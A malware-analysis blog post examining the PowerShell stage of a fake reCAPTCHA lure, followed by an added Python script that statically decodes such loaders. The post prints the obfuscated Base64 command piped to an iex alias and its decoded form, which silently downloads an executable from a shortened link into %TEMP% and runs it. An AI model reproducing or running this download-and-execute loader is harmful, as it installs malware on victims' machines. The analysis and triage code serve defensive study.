Analysis Fake reCAPTCHA ( Powershell Stage )

reversethemalware.blogspot.com · Diyar Saadi · 8 months ago · research
By Diyar Saadi | WIN32
July 16, 2025

Hello friends. In this article we will analyze an encoded PowerShell command taken from the fake CAPTCHA described in the previous article.

Read the recent blog post: https://reversethemalware.blogspot.com/2025/07/analysis-malicious-recaptcha.html

Malicious PowerShell Code:

    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgJFByb2dyZXNzUHJlZmVyZW5jZT0nU2lsZW50bHlDb250aW51ZSc7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgInJlYnJhbmQubHkvb3BlbkNhcHRjaGEiIC1PdXRGaWxlICRlbnY6VEVNUFxLakdyeU5TdS5leGU7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRlbnY6VEVNUFxLakdyeU5TdS5leGU='))|I`e`X

Decoded Malicious PowerShell Code (CyberChef):

    powershell.exe -Command $ProgressPreference='SilentlyContinue'; Invoke-WebRequest -Uri "rebrand[.ly]/openCaptcha" -OutFile $env:TEMP\KjGryNSu.exe; Start-Process -FilePath $env:TEMP\KjGryNSu.exe

The decoded command silently downloads KjGryNSu.exe and then executes it from the path it was dropped to in the %TEMP% folder.
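A static triage of this kind of loader, as an added example that is not from the original post: it pulls the Base64 literal out of a FromBase64String(...)|iex one-liner, decodes it without running anything, and reports the download URI, the drop path and whether the dropped file is then started. The sample one-liner is constructed with a placeholder host and file name, and the function and pattern names are this example's own.

```python
import base64
import re

# Literal passed to [Convert]::FromBase64String('...')
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# Pipe into Invoke-Expression or its alias, checked after backticks are removed
IEX_PIPE = re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)
URI_ARG = re.compile(r"-Uri\s+[\"']?([^\"'\s;]+)", re.I)
OUT_ARG = re.compile(r"-OutFile\s+[\"']?([^\"'\s;]+)", re.I)
RUN_ARG = re.compile(r"Start-Process\s+(?:-FilePath\s+)?[\"']?([^\"'\s;]+)", re.I)

# Constructed sample in the same shape as the page's one-liner (placeholder host/file).
CONSTRUCTED_CMD = (
    "powershell.exe -Command $ProgressPreference='SilentlyContinue'; "
    'Invoke-WebRequest -Uri "short.example.invalid/x" -OutFile $env:TEMP\\sample.exe; '
    "Start-Process -FilePath $env:TEMP\\sample.exe")
SAMPLE = ("[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(CONSTRUCTED_CMD.encode()).decode() + "'))|I`e`X")


def triage(one_liner):
    """Statically decode a FromBase64String|iex loader; nothing is executed."""
    m = B64_CALL.search(one_liner)
    if not m:
        return None
    decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    # Backtick is PowerShell's escape character; before a letter with no
    # escape meaning it is dropped, which is how I`e`X still resolves to iex.
    tail = one_liner[m.end():].replace("`", "")
    uri = URI_ARG.search(decoded)
    out = OUT_ARG.search(decoded)
    run = RUN_ARG.search(decoded)
    return {
        "decoded": decoded,
        "pipes_to_iex": bool(IEX_PIPE.search(tail)),
        "silent_progress": "silentlycontinue" in decoded.lower(),
        "download_uri": uri.group(1) if uri else None,
        "out_file": out.group(1) if out else None,
        "executed": run.group(1) if run else None,
        # Same path written by -OutFile and passed to Start-Process
        "download_and_run": bool(out and run and out.group(1).lower() == run.group(1).lower()),
    }


def defang(uri):
    """Make a URI non-clickable before it goes into a report or ticket."""
    return uri.replace(".", "[.]")
```
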